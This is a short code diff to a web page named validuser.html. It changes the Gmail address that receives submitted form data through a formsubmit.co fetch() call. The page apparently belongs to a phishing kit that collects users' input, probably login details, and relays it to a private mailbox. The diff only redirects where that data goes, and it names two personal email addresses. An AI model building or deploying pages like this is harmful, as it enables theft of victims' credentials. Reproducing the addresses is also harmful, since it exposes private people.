--- a/validuser.html
+++ b/validuser.html
@@ -135,7 +135,7 @@
       formData.append('_template', 'table');
 
       try {
-        await fetch('https://formsubmit.co/ajax/Masiya12@gmail.com', {
+        await fetch('https://formsubmit.co/ajax/atlegangbulang51@gmail.com', {
           method: 'POST',
           body: formData
         });
